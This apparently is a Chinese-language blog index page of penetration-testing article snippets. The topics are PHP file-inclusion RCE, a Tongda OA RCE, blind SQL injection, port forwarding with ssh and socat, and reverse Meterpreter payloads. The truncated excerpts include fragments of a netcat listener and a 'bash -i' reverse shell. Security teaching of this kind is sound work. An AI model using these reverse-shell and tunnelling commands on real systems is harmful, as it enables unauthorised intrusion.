渗透测试

在moonsec服务器执行 ssh -fCNR [B机器IP或省略]:[B机器端口]:[A机器的IP]:[A机器端口] [登陆B机器的用户名@服务器IP] ssh -fCNR 72…

1.简介 在PHP文件包含漏洞中，当我们找不到用于触发RCE的有效文件时，如果存在PHPINFO（它可以告诉我们临时文件的随机生成的文件名及其位置），我们可能可以包含一个临时文件来…

0x01 前言 看到文件包含（+phpinfo ） 的问题，在上次众测中出现此题目，如果没打过CTF，可能真的很少见到这种问题，当然作为小白的我，也是很少遇到，毕竟都是第一次，那就…

跟着大佬轻松复现：https://github.com/jas502n/OA-tongda-RCE 通达OA下载：https://www.tongda2000.com/downlo…

mysql协议中流程和go语言实现的恶意mysql服务器:https://blog.csdn.net/ls1120704214/article/details/88174003 p…

写在前面： 这篇文章主要写了一些加快盲注速度的技巧和盲注中比较精巧的语句，虽然注入并不是什么新技术了。但是数据库注入漏洞依然 困扰着每一个安全厂商，也鞭策着每一个安全从业者不断前进…

端口映射 将WEB服务器的80端口映射到ubuntu上的80端口 ubuntu执行 socat -d -d -d tcp-l:8080,reuseaddr,bind=0.0.0.0…

在linux反弹建立交互的时候会出现乱码 不能补全文件，方向键也会出现乱码。 解决办法 1.建立交互shell kali nc -vlnp 8080 bash -i >&am…

Wfuzz（一款支持各种Web漏洞扫描的工具） Wfuzz是一款Web应用程序暴力破解工具。它可以通过遍历以发现隐藏的资源（例如：目录、脚本和servlets等）。Wfuzz能够穷…

1 应用场景 在多个或者两个不网络中使用正向连接远程的攻击载荷，但是有时会有限制，如防火墙同事也会暴露我们在网络中的位置。让攻击载荷反向连接 meterpreter 同时也能隐藏攻…